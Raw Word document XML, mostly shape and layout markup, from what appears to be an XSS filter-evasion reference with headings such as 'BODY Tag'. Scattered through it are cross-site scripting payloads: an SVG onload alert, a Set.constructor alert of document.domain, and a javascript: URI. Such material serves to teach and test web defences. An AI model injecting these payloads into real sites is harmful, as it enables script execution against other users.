                              <a:gd name="T39" fmla="*/ 403 h 183"/>
                              <a:gd name="T40" fmla="+- 0 3771 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 2175"/>
                              <a:gd name="T42" fmla="+- 0 424 242"/>
                              <a:gd name="T43" fmla="*/ 424 h 183"/>
                              <a:gd name="T44" fmla="+- 0 3768 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 2175"/>
                              <a:gd name="T46" fmla="+- 0 424 242"/>
                              <a:gd name="T47" fmla="*/ 42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175" h="183">
                                <a:moveTo>
                                  <a:pt x="215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154" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2175" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2175" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2157" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="215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" name="Text Box 119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1"/>
                            <a:ext cx="217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&lt;svg/onload=alert('XSS')&gt;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6" o:spid="_x0000_s1239" style="position:absolute;margin-left:80.7pt;margin-top:12.1pt;width:108.75pt;height:9.15pt;z-index:-15691264;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,242" coordsize="217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">
                <v:shape id="Freeform 1198" o:spid="_x0000_s1240" style="position:absolute;left:1614;top:241;width:2175;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="217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gE3sQA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWsCMRC9F/wPYYTealYpS90aRURpDx5c9dDehs00&#10;2XYz2W5SXf+9EQre5vE+Z7boXSNO1IXas4LxKANBXHlds1FwPGyeXkCEiKyx8UwKLhRgMR88zLDQ&#10;/swlnfbRiBTCoUAFNsa2kDJUlhyGkW+JE/flO4cxwc5I3eE5hbtGTrIslw5rTg0WW1pZqn72f07B&#10;x/bXrndv/rv8bIx83uT2cjClUo/DfvkKIlIf7+J/97tO88fTHG7fpBP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4BN7EAAAA3QAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m2154,182l21,182r-3,l,161r,-3l,21,21,,2154,r21,21l2175,161r-18,21l2154,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="2154,424;21,424;18,424;0,403;0,400;0,263;21,242;2154,242;2175,263;2175,403;2157,424;2154,424" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1197" o:spid="_x0000_s1241" type="#_x0000_t202" style="position:absolute;left:1614;top:241;width:217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pj1sMA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9C/0PyxS86cYe1KSuIsVCQSjGeOhxmh2T&#10;xexszG41/feuIHibx/ucxaq3jbhQ541jBZNxAoK4dNpwpeBQfI7mIHxA1tg4JgX/5GG1fBksMNPu&#10;yjld9qESMYR9hgrqENpMSl/WZNGPXUscuaPrLIYIu0rqDq8x3DbyLUmm0qLh2FBjSx81laf9n1Ww&#10;/uF8Y87fv7v8mJuiSBPeTk9KDV/79TuIQH14ih/uLx3nT9IZ3L+JJ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pj1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&lt;svg/onload=alert('XSS')&gt;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spacing w:before="102"/>
        <w:ind w:left="154"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ECMAScript</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="10"/>
        <w:rPr>
          <w:sz w:val="13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2572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130175</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5524500" cy="262890"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="1192" name="Group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262890"/>
                          <a:chOff x="1614" y="205"/>
                          <a:chExt cx="8700" cy="414"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1193" name="Freeform 1195"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="205"/>
                            <a:ext cx="8700" cy="414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619 205"/>
                              <a:gd name="T3" fmla="*/ 619 h 414"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 8700"/>
                              <a:gd name="T6" fmla="+- 0 619 205"/>
                              <a:gd name="T7" fmla="*/ 619 h 414"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 8700"/>
                              <a:gd name="T10" fmla="+- 0 618 205"/>
                              <a:gd name="T11" fmla="*/ 618 h 414"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 8700"/>
                              <a:gd name="T14" fmla="+- 0 597 205"/>
                              <a:gd name="T15" fmla="*/ 597 h 414"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 8700"/>
                              <a:gd name="T18" fmla="+- 0 594 205"/>
                              <a:gd name="T19" fmla="*/ 594 h 414"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 8700"/>
                              <a:gd name="T22" fmla="+- 0 226 205"/>
                              <a:gd name="T23" fmla="*/ 226 h 414"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 8700"/>
                              <a:gd name="T26" fmla="+- 0 205 205"/>
                              <a:gd name="T27" fmla="*/ 205 h 414"/>
                              <a:gd name="T28" fmla="+- 0 10293 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 8700"/>
                              <a:gd name="T30" fmla="+- 0 205 205"/>
                              <a:gd name="T31" fmla="*/ 205 h 414"/>
                              <a:gd name="T32" fmla="+- 0 10314 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 8700"/>
                              <a:gd name="T34" fmla="+- 0 226 205"/>
                              <a:gd name="T35" fmla="*/ 226 h 414"/>
                              <a:gd name="T36" fmla="+- 0 10314 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 8700"/>
                              <a:gd name="T38" fmla="+- 0 597 205"/>
                              <a:gd name="T39" fmla="*/ 597 h 414"/>
                              <a:gd name="T40" fmla="+- 0 10296 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 8700"/>
                              <a:gd name="T42" fmla="+- 0 618 205"/>
                              <a:gd name="T43" fmla="*/ 618 h 414"/>
                              <a:gd name="T44" fmla="+- 0 10293 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 8700"/>
                              <a:gd name="T46" fmla="+- 0 619 205"/>
                              <a:gd name="T47" fmla="*/ 619 h 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414">
                                <a:moveTo>
                                  <a:pt x="8679" y="414"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="21" y="414"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="18" y="413"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="392"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="389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392"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8682" y="413"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="8679" y="4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" name="Text Box 1194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05"/>
                            <a:ext cx="8700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Set.constructor`alert\x28document.domain\x29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3" o:spid="_x0000_s1242" style="position:absolute;margin-left:80.7pt;margin-top:10.25pt;width:435pt;height:20.7pt;z-index:-15690752;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,205" coordsize="8700,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">
                <v:shape id="Freeform 1195" o:spid="_x0000_s1243" style="position:absolute;left:1614;top:205;width:8700;height:414;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="8700,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W7dsEA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPyWrDMBC9F/IPYgK9NbKz27UcSqElOcYt5DpYU9vE&#10;GhlL9fL3VaHQ2zzeOtlpMq0YqHeNZQXxKgJBXFrdcKXg8+Pt6QjCeWSNrWVSMJODU754yDDVduQr&#10;DYWvRAhhl6KC2vsuldKVNRl0K9sRB+7L9gZ9gH0ldY9jCDetXEfRXhpsODTU2NFrTeW9+DYKtgUd&#10;jpdd0Zzfb9OcbLaj69yo1ONyenkG4Wny/+I/91mH+XGygd9vwgky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Vu3bBAAAA3QAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9kb3du&#10;cmV2LnhtbFBLBQYAAAAABAAEAPUAAACGAwAAAAA=&#10;" path="m8679,414l21,414r-3,-1l,392r,-3l,21,21,,8679,r21,21l8700,392r-18,21l8679,414xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="8679,619;21,619;18,618;0,597;0,594;0,226;21,205;8679,205;8700,226;8700,597;8682,618;8679,619" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1194" o:spid="_x0000_s1244" type="#_x0000_t202" style="position:absolute;left:1614;top:205;width:8700;height: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9ocQA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTWvCQBC9F/wPywje6sYiUqMbEWmhIBRjevA4ZifJ&#10;YnY2zW41/vuuUOhtHu9z1pvBtuJKvTeOFcymCQji0mnDtYKv4v35FYQPyBpbx6TgTh422ehpjal2&#10;N87pegy1iCHsU1TQhNClUvqyIYt+6jriyFWutxgi7Gupe7zFcNvKlyRZSIuGY0ODHe0aKi/HH6tg&#10;e+L8zXx/ng95lZuiWCa8X1yUmoyH7QpEoCH8i//cHzrOny3n8Pgmn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I/aHEAAAA3QAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=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Set.constructor`alert\x28document.domain\x29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3"/>
        <w:rPr>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="Balk2"/>
        <w:spacing w:before="0"/>
      </w:pPr>
      <w:r>
        <w:t>BODY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Tag</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:sectPr w:rsidR="00AC7743">
          <w:pgSz w:w="11920" w:h="16860"/>
          <w:pgMar w:top="136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tabs>
          <w:tab w:val="left" w:pos="4476"/>
        </w:tabs>
        <w:spacing w:before="72"/>
        <w:ind w:left="154"/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485665792" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>3108325</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>49530</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="633095" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1189" name="Group 1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4895" y="78"/>
                          <a:chExt cx="997" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1190" name="Freeform 1192"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="4894" y="78"/>
                            <a:ext cx="997" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 5870 4895"/>
                              <a:gd name="T1" fmla="*/ T0 w 997"/>
                              <a:gd name="T2" fmla="+- 0 260 78"/>
                              <a:gd name="T3" fmla="*/ 260 h 183"/>
                              <a:gd name="T4" fmla="+- 0 4916 4895"/>
                              <a:gd name="T5" fmla="*/ T4 w 997"/>
                              <a:gd name="T6" fmla="+- 0 260 78"/>
                              <a:gd name="T7" fmla="*/ 260 h 183"/>
                              <a:gd name="T8" fmla="+- 0 4913 4895"/>
                              <a:gd name="T9" fmla="*/ T8 w 997"/>
                              <a:gd name="T10" fmla="+- 0 260 78"/>
                              <a:gd name="T11" fmla="*/ 260 h 183"/>
                              <a:gd name="T12" fmla="+- 0 4895 4895"/>
                              <a:gd name="T13" fmla="*/ T12 w 997"/>
                              <a:gd name="T14" fmla="+- 0 239 78"/>
                              <a:gd name="T15" fmla="*/ 239 h 183"/>
                              <a:gd name="T16" fmla="+- 0 4895 4895"/>
                              <a:gd name="T17" fmla="*/ T16 w 997"/>
                              <a:gd name="T18" fmla="+- 0 236 78"/>
                              <a:gd name="T19" fmla="*/ 236 h 183"/>
                              <a:gd name="T20" fmla="+- 0 4895 4895"/>
                              <a:gd name="T21" fmla="*/ T20 w 997"/>
                              <a:gd name="T22" fmla="+- 0 99 78"/>
                              <a:gd name="T23" fmla="*/ 99 h 183"/>
                              <a:gd name="T24" fmla="+- 0 4916 4895"/>
                              <a:gd name="T25" fmla="*/ T24 w 997"/>
                              <a:gd name="T26" fmla="+- 0 78 78"/>
                              <a:gd name="T27" fmla="*/ 78 h 183"/>
                              <a:gd name="T28" fmla="+- 0 5870 4895"/>
                              <a:gd name="T29" fmla="*/ T28 w 997"/>
                              <a:gd name="T30" fmla="+- 0 78 78"/>
                              <a:gd name="T31" fmla="*/ 78 h 183"/>
                              <a:gd name="T32" fmla="+- 0 5891 4895"/>
                              <a:gd name="T33" fmla="*/ T32 w 997"/>
                              <a:gd name="T34" fmla="+- 0 99 78"/>
                              <a:gd name="T35" fmla="*/ 99 h 183"/>
                              <a:gd name="T36" fmla="+- 0 5891 4895"/>
                              <a:gd name="T37" fmla="*/ T36 w 997"/>
                              <a:gd name="T38" fmla="+- 0 239 78"/>
                              <a:gd name="T39" fmla="*/ 239 h 183"/>
                              <a:gd name="T40" fmla="+- 0 5873 4895"/>
                              <a:gd name="T41" fmla="*/ T40 w 997"/>
                              <a:gd name="T42" fmla="+- 0 260 78"/>
                              <a:gd name="T43" fmla="*/ 260 h 183"/>
                              <a:gd name="T44" fmla="+- 0 5870 4895"/>
                              <a:gd name="T45" fmla="*/ T44 w 997"/>
                              <a:gd name="T46" fmla="+- 0 260 78"/>
                              <a:gd name="T47" fmla="*/ 26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5" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="996" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="996" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="978" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="97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" name="Text Box 1191"/>
                        <wps:cNvSpPr txBox="1">
                          <a:spLocks noChangeArrowheads="1"/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="4894" y="78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7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javascript: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0" o:spid="_x0000_s1245" style="position:absolute;left:0;text-align:left;margin-left:244.75pt;margin-top:3.9pt;width:49.85pt;height:9.15pt;z-index:-17650688;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="4895,78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">
                <v:shape id="Freeform 1192" o:spid="_x0000_s1246" style="position:absolute;left:4894;top:78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agxMcA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBCF70L/wzIFL6VuYqFo6ipSKXiwgml7H7Nj&#10;EszOptmNpv++cxC8zfDevPfNYjW4Rl2oC7VnA+kkAUVceFtzaeD76+N5BipEZIuNZzLwRwFWy4fR&#10;AjPrr3ygSx5LJSEcMjRQxdhmWoeiIodh4lti0U6+cxhl7UptO7xKuGv0NEletcOapaHClt4rKs55&#10;7wx8/s71ZtOc10/73akP/fHn+GJTY8aPw/oNVKQh3s23660V/HQu/PKNjKC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2oMTHAAAA3QAAAA8AAAAAAAAAAAAAAAAAmAIAAGRy&#10;cy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACMAwAAAAA=&#10;" path="m975,182r-954,l18,182,,161r,-3l,21,21,,975,r21,21l996,161r-18,21l975,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="975,260;21,260;18,260;0,239;0,236;0,99;21,78;975,78;996,99;996,239;978,260;975,260" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 1191" o:spid="_x0000_s1247" type="#_x0000_t202" style="position:absolute;left:4894;top:78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9eOcMA&#10;AADdAAAADwAAAGRycy9kb3ducmV2LnhtbERPTYvCMBC9L/gfwgje1rR7kLUaRcQFQVi21oPHsRnb&#10;YDOpTdTuv98sCN7m8T5nvuxtI+7UeeNYQTpOQBCXThuuFByKr/dPED4ga2wck4Jf8rBcDN7mmGn3&#10;4Jzu+1CJGMI+QwV1CG0mpS9rsujHriWO3Nl1FkOEXSV1h48Ybhv5kSQTadFwbKixpXVN5WV/swpW&#10;R8435vp9+snPuSmKacK7yUWp0bBfzUAE6sNL/HRvdZyfTlP4/yae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9eO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7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javascript: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666304" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>3887470</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>49530</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="586740" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1188" name="Freeform 1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" cy="116205"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="+- 0 7024 6122"/>
                            <a:gd name="T1" fmla="*/ T0 w 924"/>
                            <a:gd name="T2" fmla="+- 0 260 78"/>
                            <a:gd name="T3" fmla="*/ 260 h 183"/>
                            <a:gd name="T4" fmla="+- 0 6143 6122"/>
                            <a:gd name="T5" fmla="*/ T4 w 924"/>
                            <a:gd name="T6" fmla="+- 0 260 78"/>
                            <a:gd name="T7" fmla="*/ 260 h 183"/>
                            <a:gd name="T8" fmla="+- 0 6140 6122"/>
                            <a:gd name="T9" fmla="*/ T8 w 924"/>
                            <a:gd name="T10" fmla="+- 0 260 78"/>
                            <a:gd name="T11" fmla="*/ 260 h 183"/>
                            <a:gd name="T12" fmla="+- 0 6122 6122"/>
                            <a:gd name="T13" fmla="*/ T12 w 924"/>
                            <a:gd name="T14" fmla="+- 0 239 78"/>
                            <a:gd name="T15" fmla="*/ 239 h 183"/>
                            <a:gd name="T16" fmla="+- 0 6122 6122"/>
                            <a:gd name="T17" fmla="*/ T16 w 924"/>
                            <a:gd name="T18" fmla="+- 0 236 78"/>
                            <a:gd name="T19" fmla="*/ 236 h 183"/>
                            <a:gd name="T20" fmla="+- 0 6122 6122"/>
                            <a:gd name="T21" fmla="*/ T20 w 924"/>
                            <a:gd name="T22" fmla="+- 0 99 78"/>
                            <a:gd name="T23" fmla="*/ 99 h 183"/>
                            <a:gd name="T24" fmla="+- 0 6143 6122"/>
                            <a:gd name="T25" fmla="*/ T24 w 924"/>
                            <a:gd name="T26" fmla="+- 0 78 78"/>
                            <a:gd name="T27" fmla="*/ 78 h 183"/>
                            <a:gd name="T28" fmla="+- 0 7024 6122"/>
                            <a:gd name="T29" fmla="*/ T28 w 924"/>
                            <a:gd name="T30" fmla="+- 0 78 78"/>
                            <a:gd name="T31" fmla="*/ 78 h 183"/>
                            <a:gd name="T32" fmla="+- 0 7045 6122"/>
                            <a:gd name="T33" fmla="*/ T32 w 924"/>
                            <a:gd name="T34" fmla="+- 0 99 78"/>
                            <a:gd name="T35" fmla="*/ 99 h 183"/>
                            <a:gd name="T36" fmla="+- 0 7045 6122"/>
                            <a:gd name="T37" fmla="*/ T36 w 924"/>
                            <a:gd name="T38" fmla="+- 0 239 78"/>
                            <a:gd name="T39" fmla="*/ 239 h 183"/>
                            <a:gd name="T40" fmla="+- 0 7027 6122"/>
                            <a:gd name="T41" fmla="*/ T40 w 924"/>
                            <a:gd name="T42" fmla="+- 0 260 78"/>
                            <a:gd name="T43" fmla="*/ 260 h 183"/>
                            <a:gd name="T44" fmla="+- 0 7024 6122"/>
                            <a:gd name="T45" fmla="*/ T44 w 924"/>
                            <a:gd name="T46" fmla="+- 0 260 78"/>
                            <a:gd name="T47" fmla="*/ 260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24" h="183">
                              <a:moveTo>
                                <a:pt x="902" y="182"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="21" y="182"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="18" y="182"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="161"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="15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902" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="923" y="21"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="923" y="161"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="905" y="182"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="902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86B18" id="Freeform 1189" o:spid="_x0000_s1026" style="position:absolute;margin-left:306.1pt;margin-top:3.9pt;width:46.2pt;height:9.15pt;z-index:-1765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" path="m902,182r-881,l18,182,,161r,-3l,21,21,,902,r21,21l923,161r-18,21l902,182xe" fillcolor="#f5f5f5" stroked="f">
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="572770,165100;13335,165100;11430,165100;0,151765;0,149860;0,62865;13335,49530;572770,49530;586105,62865;586105,151765;574675,165100;572770,165100" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                <w10:wrap anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:t>Method</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>doesn't</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>require</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5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variants</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>of</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>or</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console"/>
          <w:color w:val="36454E"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>&lt;SCRIPT...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console"/>
          <w:color w:val="36454E"/>
          <w:spacing w:val="-15"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>to accomplish</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>the XSS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>attack). Dan</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Crowley</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="76"/>
        <w:ind w:left="154"/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666816" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>4142105</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>52070</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="417195" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1187" name="Freeform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7195" cy="116205"/>
                        </a:xfrm>
                        <a:custGeom>
                          <a:avLst/>
                          <a:gdLst>
                            <a:gd name="T0" fmla="+- 0 7158 6523"/>
                            <a:gd name="T1" fmla="*/ T0 w 657"/>
                            <a:gd name="T2" fmla="+- 0 264 82"/>
                            <a:gd name="T3" fmla="*/ 264 h 183"/>
                            <a:gd name="T4" fmla="+- 0 6544 6523"/>
                            <a:gd name="T5" fmla="*/ T4 w 657"/>
                            <a:gd name="T6" fmla="+- 0 264 82"/>
                            <a:gd name="T7" fmla="*/ 264 h 183"/>
                            <a:gd name="T8" fmla="+- 0 6541 6523"/>
                            <a:gd name="T9" fmla="*/ T8 w 657"/>
                            <a:gd name="T10" fmla="+- 0 264 82"/>
                            <a:gd name="T11" fmla="*/ 264 h 183"/>
                            <a:gd name="T12" fmla="+- 0 6523 6523"/>
                            <a:gd name="T13" fmla="*/ T12 w 657"/>
                            <a:gd name="T14" fmla="+- 0 243 82"/>
                            <a:gd name="T15" fmla="*/ 243 h 183"/>
                            <a:gd name="T16" fmla="+- 0 6523 6523"/>
                            <a:gd name="T17" fmla="*/ T16 w 657"/>
                            <a:gd name="T18" fmla="+- 0 240 82"/>
                            <a:gd name="T19" fmla="*/ 240 h 183"/>
                            <a:gd name="T20" fmla="+- 0 6523 6523"/>
                            <a:gd name="T21" fmla="*/ T20 w 657"/>
                            <a:gd name="T22" fmla="+- 0 103 82"/>
                            <a:gd name="T23" fmla="*/ 103 h 183"/>
                            <a:gd name="T24" fmla="+- 0 6544 6523"/>
                            <a:gd name="T25" fmla="*/ T24 w 657"/>
                            <a:gd name="T26" fmla="+- 0 82 82"/>
                            <a:gd name="T27" fmla="*/ 82 h 183"/>
                            <a:gd name="T28" fmla="+- 0 7158 6523"/>
                            <a:gd name="T29" fmla="*/ T28 w 657"/>
                            <a:gd name="T30" fmla="+- 0 82 82"/>
                            <a:gd name="T31" fmla="*/ 82 h 183"/>
                            <a:gd name="T32" fmla="+- 0 7179 6523"/>
                            <a:gd name="T33" fmla="*/ T32 w 657"/>
                            <a:gd name="T34" fmla="+- 0 103 82"/>
                            <a:gd name="T35" fmla="*/ 103 h 183"/>
                            <a:gd name="T36" fmla="+- 0 7179 6523"/>
                            <a:gd name="T37" fmla="*/ T36 w 657"/>
                            <a:gd name="T38" fmla="+- 0 243 82"/>
                            <a:gd name="T39" fmla="*/ 243 h 183"/>
                            <a:gd name="T40" fmla="+- 0 7161 6523"/>
                            <a:gd name="T41" fmla="*/ T40 w 657"/>
                            <a:gd name="T42" fmla="+- 0 264 82"/>
                            <a:gd name="T43" fmla="*/ 264 h 183"/>
                            <a:gd name="T44" fmla="+- 0 7158 6523"/>
                            <a:gd name="T45" fmla="*/ T44 w 657"/>
                            <a:gd name="T46" fmla="+- 0 264 82"/>
                            <a:gd name="T47" fmla="*/ 264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657" h="183">
                              <a:moveTo>
                                <a:pt x="635" y="182"/>
                              </a:moveTo>
                              <a:lnTo>
                                <a:pt x="21" y="182"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="18" y="182"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="161"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="0" y="15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635" y="0"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="656" y="21"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="656" y="161"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="638" y="182"/>
                              </a:lnTo>
                              <a:lnTo>
                                <a:pt x="635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26C80" id="Freeform 1188" o:spid="_x0000_s1026" style="position:absolute;margin-left:326.15pt;margin-top:4.1pt;width:32.85pt;height:9.15pt;z-index:-176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" path="m635,182r-614,l18,182,,161r,-3l,21,21,,635,r21,21l656,161r-18,21l635,182xe" fillcolor="#f5f5f5" stroked="f">
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="403225,167640;13335,167640;11430,167640;0,154305;0,152400;0,65405;13335,52070;403225,52070;416560,65405;416560,154305;405130,167640;403225,167640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667328" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>4697730</wp:posOffset>
                </wp:positionH>
